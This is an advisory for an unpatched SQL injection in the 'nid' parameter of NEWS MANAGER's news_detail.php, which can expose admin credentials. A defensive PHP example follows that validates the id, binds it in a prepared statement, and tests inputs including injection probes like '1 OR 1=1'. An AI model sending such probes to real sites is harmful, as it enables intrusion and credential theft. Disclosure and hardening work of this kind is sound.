Vendor: NEWS MANAGER
By: Hussin X
CVSS: 7.5 HIGH
Remote SQL Injection
CWE: 89
Product Name: NEWS MANAGER
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
NEWS MANAGER (nid) Remote SQL Injection Vulnerability
The vulnerability allows an attacker to inject SQL queries into the 'nid' parameter of the 'news_detail.php' script. By manipulating the query, an attacker can retrieve sensitive information such as login credentials from the admin table.
Mitigation:
The vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Users should update to the latest version of the software.
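A sketch of the mitigation described above, as an added example that is not NEWS MANAGER's own code: the 'nid' value is validated as a positive integer and then bound to a prepared statement instead of being concatenated into the query. The function name `fetch_news`, the `news` table and its columns are assumptions, and the database is a constructed in-memory SQLite instance (needs the pdo_sqlite extension).

```php
<?php
declare(strict_types=1);

// Hardened lookup for a news_detail.php-style handler.
// Illustrative only: table and column names are assumed, not taken from the product.
function fetch_news(PDO $pdo, $rawNid): ?array
{
    // 1. Input validation: nid must be a positive integer and nothing else.
    $nid = filter_var($rawNid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($nid === false) {
        return null; // reject the request instead of passing the value to the database
    }

    // 2. Parameterized query: the value is bound as data, never spliced into the SQL text.
    $stmt = $pdo->prepare('SELECT nid, title, body FROM news WHERE nid = :nid');
    $stmt->bindValue(':nid', $nid, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed in-memory database so the example runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news (nid INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$pdo->exec("INSERT INTO news VALUES (1, 'First post', 'Hello'), (2, 'Second post', 'World')");

// Constructed inputs: a valid id, an unknown id, and values that are not plain integers.
foreach (['2', '99', '1 OR 1=1', "1'", '', '-5'] as $input) {
    $row = fetch_news($pdo, $input);
    printf(
        "nid=%-12s => %s\n",
        var_export($input, true),
        $row !== null ? $row['title'] : 'rejected or not found'
    );
}
```

Only the first input returns a row; every value that is not a positive integer is rejected before any SQL is executed, and the bound parameter keeps the query text fixed even if the validation step were removed.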